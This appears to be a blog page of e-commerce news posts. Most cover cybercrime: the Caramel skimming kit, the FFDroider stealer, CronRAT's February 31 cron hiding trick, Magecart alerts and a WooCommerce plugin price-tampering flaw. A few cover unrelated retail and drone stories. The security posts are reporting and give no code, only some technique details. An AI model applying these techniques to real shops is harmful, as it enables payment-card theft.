Search This Blog

Showing posts with label E-Commerce. Show all posts

Caramel Credit Card Theft is Proliferating Day by Day


A credit card stealing service is gaining traction, providing a simple and automated option for low-skilled threat actors to enter the sphere of financial fraud. Credit card skimmers are malicious scripts that are put into compromised e-commerce websites and wait patiently for customers to make a purchase. 

Following a purchase, these malicious scripts capture credit card information and transport it to remote sites, where threat actors can collect it. Threat actors then use these cards to make online purchases for themselves or sell the credit card information to other threat actors on dark web markets for as little as a few dollars. Domain Tools found the new service, which claims that it is run by a Russian criminal outfit called "CaramelCorp." 

Subscribers receive a skimmer script, deployment instructions, and a campaign management panel, which includes everything a threat actor needs to start their own credit card stealing campaign. Caramel only sells to Russian-speaking threat actors after a first verification procedure that weeds out individuals who use machine translation or are new to the sector. 

A lifetime subscription costs $2,000, which isn't cheap for aspiring threat actors, but it includes complete customer service, code upgrades, and growing anti-detection methods for Russian-speaking hackers. 

The "setInterval()" technique, which exfiltrates data between preset periods, is used to acquire credit card data. While it may not appear to be an efficient strategy, it can be used to collect information from abandoned carts and completed purchases. Finally, the campaigns are managed through a panel that allows the subscriber to monitor the affected e-shops, configure the gateways for obtaining stolen data, and more. 

While Caramel isn't new, and neither are skimming campaigns. In December 2020, Bleeping Computer discovered the first dark web posts offering the kit for sale. Caramel has grown in popularity in the underground scene thanks to continued development and advertising. The existence of Caramel and other similar skimming services lowers the technical barrier to starting up and managing large-scale card skimming campaigns, potentially increasing the prevalence of skimmer operations. 

One can defend themself from credit card skimmers as an e-commerce platform user by utilising one-time private cards, putting up charging limitations and prohibitions, or just using online payment methods instead of cards.

FFDroider: A New Malware that Hacks Social Media Accounts


FFDroider, a new kind of information stealer has emerged, it steals cookies and credentials from browsers and hacks the target's social media accounts. FFDroider, like any other malware, spreads through software cracks, free software games/apps, and other downloaded files from torrent sites. While installing these downloads, FFDroider will also be initialized, but as a Telegram desktop app disguise to avoid identification. After it's launched, the malware creates "FFDroider" named windows registry key, which eventually led to the naming of this malware. 

FFDroider targets account credentials and cookies stored in browsers like Chrome, Mozilla Firefox, Microsoft edge, and internet explorer. For instance, the malware scans and parses SQLite Credential stores, Chromium SQLite cookies, and decrypts these entries by exploiting Windows Crypt API, particularly, the CryptUnProtectData function. The process is similar to other browsers, with functions such as InternetGetCookieRxW and IEGet ProtectedMode Cookie exploited for stealing the cookies in Microsoft Edge and Internet Explorer. 

"If the authentication is successful on Facebook, for example, FFDroider fetches all Facebook pages and bookmarks, the number of the victim's friends, and their account billing and payment information from the Facebook Ads manager," reports Bleeping Computer. The decryption and stealing of these cookies lead to clear text usernames and passwords, which are later extracted through an HTTP Post request from the C2 server in the malware campaign. 

FFDroider isn't like other passwords hacking Trojans, its operators do not care about all account credentials present in the browsers. On the contrary, the malware operators focus on stealing credentials from social media accounts and e-commerce websites, these include Amazon, Facebook, Instagram, eBay, Etsy, Twitter, and WAX Cloud wallet's portal. Bleeping Computer reports, "after stealing the information and sending everything to the C2, FFDroid focuses on downloading additional modules from its servers at fixed time intervals."

NCSC Urges Customers to Stay Aware About Scams On E-commerce Platforms


National Cyber Security Centre (NCSC) made a final request to customers prior to the busiest weekend before Christmas, to be aware of fraud and data theft attacks. The GCHQ agency requested customers to secure their devices, be informed about unsolicited messages, and reduce the size of information they input into online shopping websites and e-commerce websites. As per the banking body of UK Finance, around €22 bn was spent online on Christmas shopping last year because of the Covid-19 pandemic. 

Currently, with the rise of the Omicron variant, 2021 probably experienced a similar pattern, risking more customers vulnerable online. The attacks may come in many forms, it may include phishing emails having fake shipping details, and fake warnings about hacked accounts or fake gift cards which require the user to share personal details in order to use the offers. Customers may also be contacted through social media messages and emails having "unbelievable" offers for popular discount gift items, like electronics. Once the customer falls for these tricks, he loses his money along with banking details and personal information, which is stolen by the hackers. 

As per NCSC, the urge to buy last moment presents during a festival may be a reason that customers fall victim to such attacks easily. In order to be safe, users can follow some practical steps like having a strong password on websites before placing an order. It is advised to use strong, unique passwords with two-factor authentication for every account, especially banking, email and payment services. Online customers are also advised to avoid unsolicited notifications, particularly messages linked to suspicious websites, and platforms that depend on payment with a credit card. 

Lastly, customers should log in as guests while making a purchase to avoid revealing too much personal information. As per NCSC, "if you think your credit or debit card has been used by someone else, let your bank know straight away so they can block anyone using it. Always contact your bank using the official website or phone number. Don't use the links or contact details in the message you have been sent or given over the phone."

CronRAT is a Linux Malware that Hides in Cron Jobs with Invalid Dates


Researchers have discovered a novel Linux remote access trojan (RAT) that uses a never-before-seen stealth approach that includes scheduling malicious actions for execution on February 31st, a non-existent calendar day. CronRAT, according to Sansec Threat Research, "enables server-side Magecart data theft that avoids browser-based security solutions." The RAT was spotted on multiple online stores, including the country's largest outlet, according to the Dutch cybersecurity firm. 

CronRAT takes advantage of the Linux task scheduling system cron, which allows tasks to be scheduled on days that do not exist on the calendar, such as February 31st. Even if the day does not exist in the calendar, the Linux cron system accepts date requirements as long as they have a proper format, which implies the scheduled task will not run. CronRAT relies on this to maintain its anonymity. According to research released by Sansec, it hides a "sophisticated Bash programme" in the names of scheduled tasks. 

"The CronRAT adds a number of tasks to crontab with a curious date specification: 52 23 31 2 3," the researchers explained. "These lines are syntactically valid, but would generate a run time error when executed. However, this will never happen as they are scheduled to run on February 31st." 

The RAT also employs a variety of obfuscation techniques to make analysis more difficult, such as hiding code behind encoding and compression barriers and implementing a custom binary protocol with random checksums to get around firewalls and packet inspectors before establishing communications with a remote control server and waiting for further instructions. The attackers linked to CronRAT can run any code on the infected system with this backdoor access, according to the researchers. 

"Digital skimming is moving from the browser to the server and this is yet another example," Sansec's Director of Threat Research, Willem de Groot, said. "Most online stores have only implemented browser-based defenses, and criminals capitalize on the unprotected back-end. Security professionals should really consider the full attack surface." 

Sansec describes the new malware as “a serious threat to Linux eCommerce servers,” due to its capabilities such as fileless execution, timing modulation, anti-tampering checksums, controlled via binary, obfuscated protocol, launches tandem RAT in separate Linux subsystem, control server disguised as “Dropbear SSH” service and payload hidden in legitimate CRON scheduled task names.

Software Flaw in E-Commerce Sites Abused by Hackers


The National Cyber Security Centre (NCSC) of the United Kingdom has notified the administrators of over 4,000 online retailers warning that their sites had been penetrated with Magecart attacks to steal consumers' financial information. 

Malicious actors infuse scripts known as credit card skimmers (aka payment card skimmers or web skimmers) into vulnerable online stores in Magecart attacks (also known as web skimming, digital skimming, or e-Skimming) to extract and rob payment or personal information submitted by patrons at the payment page. 

Eventually, the attackers would exploit this data in different financial and identity theft fraud operations, or they will auction it to the highest bidder on hacking or carding sites. 

"The National Cyber Security Centre – a part of GCHQ – proactively identified 4,151 compromised online shops up to the end of September and alerted retailers to these security vulnerabilities," the UK cybersecurity agency said. 

"The majority of the online shops used for skimming identified by the NCSC had been compromised via a known vulnerability in Magento, a popular e-commerce platform." 

Throughout April 2020, NCSC has been monitoring these stores and has sent alerts to site operators and small and medium-sized organizations (SMEs) after finding the infected e-commerce sites through its Active Cyber Defence program. 

During Black Friday and Cyber Monday affected online merchants were reminded to maintain Magento — and any other software they employ — up to date to prevent attackers from breaching their servers and compromising their online shops and customers' data. 

"We want small and medium-sized online retailers to know how to prevent their sites from being exploited by opportunistic cybercriminals over the peak shopping period," said Sarah Lyons, NCSC Deputy Director for Economy and Society. 

"It's important to keep websites as secure as possible and I would urge all business owners to follow our guidance and make sure their software is up to date." She added.

The organization also advises individuals and families who would like to buy online securely, to only purchase from trusted online retailers, utilize credit cards for online payments, and always be on the lookout for suspicious emails and text messages featuring offers that appear too good to be true. 

The US Cybersecurity and Infrastructure Security Agency (CISA) also issued security guidelines for staying safe while buying online. 

"On Black Friday and Cyber Monday the hackers will be out to steal shoppers' cash and damage the reputations of businesses by making their websites into cyber traps," said Steve Barclay, Chancellor of the Duchy of Lancaster. 

"It's critical, with more and more trade moving online, to protect your business and your customers by following the guidance provided by the National Cyber Security Centre and British Retail Consortium."

WooCommerce Multi Currency Bug Allows Customers to Modify the Cost of Items on Online Stores


A security flaw in the WooCommerce Multi Currency plugin might allow any consumer to alter product prices in online stores. WooCommerce Multi Currency enables consumers to switch currencies and assists the shop in accepting multi-currency payments. It is possible to set the exchange rate manually or automatically. The plugin may automatically detect the customer's location and display the price in their local currency. 

WooCommerce is a WordPress-based eCommerce plugin; the Multi Currency plugin from Envato, on the other hand, allows WooCommerce users to customise prices for foreign customers. On the Envato Marketplace, it has a total of 7,700 sales. 

According to Ninja Technologies Network (NinTechNet), the problem is a broken access-control vulnerability in Multi Currency version 2.1.17 and lower, which affects the “Import Fixed Price” feature, which allows eCommerce sites to set custom prices, overwriting any prices calculated automatically by exchange rate. 

“The import function, import_csv(), is loaded by the wmc_bulk_fixed_price AJAX hook in the “woocommerce-multi-currency/includes/import-export/import-csv.php” script,” according to a NinTechNet analysis on Monday. “The function lacks a capability check and a security nonce, and therefore is accessible to all authenticated users, which includes WooCommerce customers.” 

Cybercriminals might take advantage of the flaw by uploading a specially prepared CSV file to the site that contains the current currency of a product as well as the product ID. According to experts, this permits them to modify the price of one or more items. A comma-separated values (CSV) file allows you to save data in a tabular format. Most spreadsheet programmes, such as Microsoft Excel or Google Spreadsheets, can open SV files. They vary from other spreadsheet file types in that they can only contain a single sheet and do not store cell, column, or row information. In addition, formulas cannot be saved in this format. 

“The vulnerability is particularly damaging for online shops selling digital goods because the attacker will have time to download the goods,” they said. “It is important to verify every order because the hack doesn’t change the product’s price in the backend, hence the shop manager may unlikely notice it immediately.” 

Patching needs for WooCommerce users have been increasing recently. Envato's WooCommerce Dynamic Pricing and Discounts plugin was discovered to have two security vulnerabilities in late August, which may allow unauthenticated attackers to inject malicious code onto websites running unpatched versions. This can lead to a number of assaults, such as website redirection to phishing pages, the injection of malicious scripts on product pages, and so on.

E-Commerce Theft: Dark Web Card Payment Store ValidCC Shut Down

A dark web market handled by a cybercrime group, Valid CC has been hacking online merchants and stealing payment credentials for more than six years. Last week, Valid CC closed down abruptly. The owners of Valid CC say that a law enforcement operation seized their servers. The operation aimed to seize and capture the store's infrastructure. A number of online shops sell "card not present" or "CNP" payment data on the internet. The payment data may be stolen from credit cards of e-commerce stores, but it's mostly sourced from cybercriminals and threat actors.  

However, in the case of Valid CC, experts believe that the store attacked and hacked hundreds of e-commerce merchants. The hackers seeded websites with hidden card skimming codes that stole personal information and payment credentials when a customer went through the checkout stage.   Group-IB, a Russian based cybersecurity firm, had published a report last year where it briefed about the operations of Valid CC, highlighting that Valid CC was responsible for hacking around 700 e-commerce stores. Besides this, Group IB identified another group "UltraRank" responsible for attacking additional 13 third-party suppliers that offered software components to these online stores spread across Europe, America, and Asia.  

Experts believe that UltraRank orchestrated a series of cyberattacks, which were earlier attributed to three different cybercrime groups by cybersecurity firms. "Over five years….UltraRank changed its infrastructure and malicious code on numerous occasions, as a result of which cybersecurity experts would wrongly attribute its attacks to other threat actors,” said Group-IB. It adds, “UltraRank combined attacks on single targets with supply chain attacks.” Valid CC's muscle man on various platforms- a hacker who goes by the handle of SPR, notified customers that the shop would be shut down from 28 January, following a law enforcement operation that sealed Valid CC's operations. 

According to SPR, Valid CC lost access to more than 600,000 unsold payment card accounts, a very heavy blow to the store's inventory.  As a result, Valid CC lost its proxy and destination servers, and now it can't open and decrypt the back-end, says SPR.  Group-IB reports, "the store’s official representative on underground forums is a user with the nickname SPR. In many posts, SPR claims that the card data sold in the ValidCC store was obtained using JS sniffers. Most of SPR’s posts are written in English, however, SPR often switches to Russian, while communicating with customers. This might indicate that ValidCC is probably managed by a Russian speaker."  

"Not Amazon" Canadian Website Takes on the Online Giant

The e-commerce giants, with their evidently endless collection and drive to deliver convenience along with affordable prices, have become an all-too-familiar and essential service for many consumers at the height of the ongoing global pandemic. 

While small businesses and local retailers have been ending up with nothing in this pandemic, the worldwide lockdowns, and restrictions, have been fruitful for the e-commerce market, especially for the Seattle-based e-commerce giant Amazon, which has made humongous profits in billions. 

The pandemic has proved as mounting inequity between people and markets, and it was brought into focus by Ali Haberstroh. As the pandemic deepened, offline markets were closed but online shopping continued which consequently created inequality that was highlighted by one Canadian woman who expressed her disapproval as she fought back for the cause. 

“I just hate how much Jeff Bezos and Amazon are making billions off the backs of working-class people,” said Ali Haberstroh. “It seems to me they’re putting money over the wellbeing of people.” 

It was in late November 2020 when the snow was painting Ali Haberstroh’s apartment into a white house when the idea occurred to her. At the time, Canada was about to shut the market again as the second wave of lockdown hit the Canadian lanes in an attempt to curb rising COVID-19 cases. 
In anticipation, Toronto’s vintage clothing owner who is a friend of Ms. Haberstroh’s had put together names of other local vintage shops offering product curbside pickup and deliveries instead of shutting doors. 

“It was a wake-up call,” Ms. Haberstroh, 27, said of the list, which reminded her how large retailers like Walmart, Costco, and Amazon had thrived during the pandemic while much smaller, local businesses had been increasingly forced to discontinue their operations. “I thought if there is one tiny thing I can do to help, then I should get on it.” 

Being as inspired as she was by this idea, Haberstroh readied herself to build a more comprehensive list; following up, she has created an Instagram post, tagging independent businesses, and shopkeepers across Toronto. Moreover, she came up with a new website by the name “” — a URL that she had bought for $2.99. 

Introduced as a local list to help keep small businesses alive, 'Not Amazon' was created “so you don’t have to give any money to Amazon this year!” her Instagram post read. 

“At first it started off as a bit of a joke, with the name, but soon I really wanted to make it like Amazon, having everything in one place,” she said. “I didn’t want people to have an excuse not to shop local.” 

So far, the website “” has accumulated more than half a million page views and is witnessing the participation from 4,000 businesses across Toronto, Halifax Calgary, and Vancouver. 
Furthermore, the cause is seen to have gained worldwide acceptance as thousands of stores owner await their submission to this site along with Ms. Haberstroh’s approval. 

“In a big city like Toronto, where it feels like most businesses are local, I think it’s so easy to think these things will be here forever,” said Ms. Haberstroh, who works as a social media manager at a marketing firm and plans to expand her rebellious project 'Not Amazon' to even more cities. “You don’t think that they’re going to go anywhere.” 

 “Small businesses have always made Toronto magical. They’re what makes this city what it is. And so I think we owe it to them to keep them alive.” She added.

E-Commerce Attacks Didn't Increase During Coronavirus Quarantine

Due to the COVID-19 pandemic, people across the globe to stay at home. The quarantine has increased online shopping figures. Even though a majority of the people are shopping online for everything, from food to groceries to daily essentials, the web skimming attacks didn't increase and are supposedly expected not to in the near time, due to it, say cybersecurity experts. Web skimming or Magekart attacks or e-skimming is a kind of cyberattack where the attacker inserts malicious codes in the online stores' website. When the users make any payment in the checkout process while entering the data, the hackers steal their credit card credentials.

Web skimming attacks were famous amid the hackers during 2017-18 and had been rising since then. Various cybersecurity experts and agencies, when asked about 'the impact of large scale online shopping on the web skimming incidents,' they all agree that web skimming attacks will not rise just because more people are shopping now, spending most of their time online, while staying at home. It is because, for a very long time, hackers have tried to breach prominent e-commerce websites but have failed to do so, while the web skimming incidents have remained constant through the years.

According to these cybersecurity experts, there's only one condition under which web skimming attacks can increase, and that is only when the number of online stores will increase can the hackers look for new sites to attack. Unless that happens, the rate of web skimming attacks will remain the same. According to the statistical analyses by Sanguine Security, the data shows that web skimming attacks have slightly fallen during the COVID-19 pandemic. However, not every cybersecurity agency agrees with this data.

But according to Jerome Segura, who is a web analyst at Malwarebytes, the web skimming attacks on online stores have not increased, therefore it confirms with Sanguine Security's data. It may be because the number of online stores increased before 2-3 months, but nobody observed these attacks during that time. Another reason might be that buyers prefer shopping from popular e-commerce websites, which are hard to breach through for hackers.

Zomato successfully tests its drone technology

E-commerce companies and food-delivery platforms are globally believed to be among the first adopters of drone-based delivery.

Zomato, the online ordering and food delivery platform, on Wednesday announced that it has successfully tested its drone delivery technology. The test, which was conducted using a hybrid drone, was a part of the company's attempts to reduce the time taken to make a food delivery to its customers.

The first test saw Zomato make a drone-based food package delivery under restricted conditions, covering 5 km in 10 minutes and at peak speed of 80 kmph.

"The drone was tested last week at one of the remote sites approved by the DGCA. Such tests are done at very remote sites which are especially designed to conduct such tests," Zomato told IANS.

It comes months after Gurgaon-headquartered firm had acquired Lucknow-based drone startup TechEagle to reduce food delivery times and solve other issues like pollution and traffic. Zomato also revealed that it is forming a consortium as per Director General of Civil Aviation (DGCA) guidelines to carry out experimental Beyond Visual Line of Sight (BVLOS) drone operations.

However, the food aggregator did not reveal the exact location where the drone delivered the package.

According to the notification issued by Director General of Civil Aviation (DGCA) on May 13, interested companies have been asked to submit an Expression of Interest (EOI) to the DGCA for conducting experimental Beyond Visual Line of Sight operations (BVLOS) of Remotely Piloted Aircraft Systems (RPAS)/Unmanned Aircraft Systems (UAS).

Currently, while regulations prohibit payload carriage on drones along with disallowing drone operations outside visual line of sight, the government — while announcing rules for unmanned aerial vehicles (UAV) in August last — had said that the norms will be evolved with time as and when companies are able to exhibit newer technologies.

"The only possible way to reduce the average 30 minutes to 15 minutes is to take the aerial route. Roads are not efficient for very fast deliveries.